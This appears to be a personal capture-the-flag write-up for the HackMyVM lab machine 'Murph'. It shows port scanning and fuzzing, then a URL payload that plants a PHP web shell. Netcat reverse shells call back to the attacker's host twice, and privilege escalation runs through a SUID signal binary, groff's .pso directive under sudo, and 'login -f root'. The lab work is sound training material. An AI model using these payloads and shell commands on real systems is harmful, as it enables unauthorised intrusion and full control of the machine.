NOTES ABOUT Murph

[ 2022-10-10 ] [ HackMyVM / Murph ]

Status: Rooted
Skills: Port Scanning, Fuzzing, PHP Backdoor, RCE, Reverse Shell, SIGNALS
Tools: nmap, nc, gobuster, groff, login

PORT SCANNING

$ nmap -T4 -sCSV -p- 10.0.2.26

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 b2:c9:f2:72:7a:ad:71:52:df:9b:31:b1:a9:87:dc:54 (RSA)
| 256 e9:73:af:55:81:50:2b:13:4c:fe:92:31:c4:b7:ae:4d (ECDSA)
|_ 256 ad:c1:58:71:0e:fc:c8:9e:86:9c:c7:3f:85:be:2d:c8 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0

GETTING IN

$ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,xml -u http://10.0.2.26
/index.html (Status: 200) [Size: 266]
/uploads (Status: 301) [Size: 169] [--> http://10.0.2.26/uploads/]

PAYLOAD:

http://10.0.2.26/saveit.php?filename=cmd.phtml&content=%3C%3FPHP+echo+exec%28%24_GET%5B%27c%27%5D%29%3B+%3F%3E
http://10.0.2.26/uploads/cmd.phtml?c=nc%20-c%20/bin/bash%2010.0.2.15%2080

REVERSE SHELL:

$ nc -lvnp 80
listening on [any] 80 ...
connect to [10.0.2.15] from (UNKNOWN) [10.0.2.26] 45770
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@murph:~/html/uploads$

ELEVATING PRIVILEGES

www-data@murph:~/html/uploads$ find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null

-rwsr-sr-x 1 root www-data 16896 May 31 10:28 /opt/murph
[...]

www-data@murph:~/html/uploads$ /opt/murph
/opt/murph
Waiting SIGUSR1....
^C


www-data@murph:~/html/uploads$ /opt/murph&
[1] 668
www-data@murph:~/html/uploads$ Waiting SIGUSR1

www-data@murph:~/html/uploads$ kill -SIGUSR1 668
www-data@murph:~/html/uploads$ fg

jen@murph:~/html/uploads$ id
uid=1000(jen) gid=33(www-data) groups=33(www-data)

jen@murph:/home/jen$ cat user.txt
****************

jen@murph:/home/jen$ sudo -l
[...]
User jen may run the following commands on murph:
(pat) NOPASSWD: /usr/bin/groff

groff [ exploit-db/exploits/19430 ]

jen@murph:~/html/uploads$ sudo -u pat /usr/bin/groff -U
sudo -u pat /usr/bin/groff -U
.pso nc -c /bin/bash 10.0.2.15 443

AND A NEW REVERSE SHELL...

$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.0.2.15] from (UNKNOWN) [10.0.2.26] 55980
id
uid=1001(pat) gid=1001(pat) groups=1001(pat)

python3 -c "import pty;pty.spawn('/bin/bash')"
pat@murph:/var/www/html/uploads$ ls -la /home/pat

pat@murph:/var/www/html/uploads$ sudo -l
[...]
(root) NOPASSWD: /usr/bin/login

pat@murph:/var/www/html/uploads$ sudo -u root login -f root

root@murph:~# cat root.txt
****************

root@murph:~# init 0

--- Loaded 397 times ---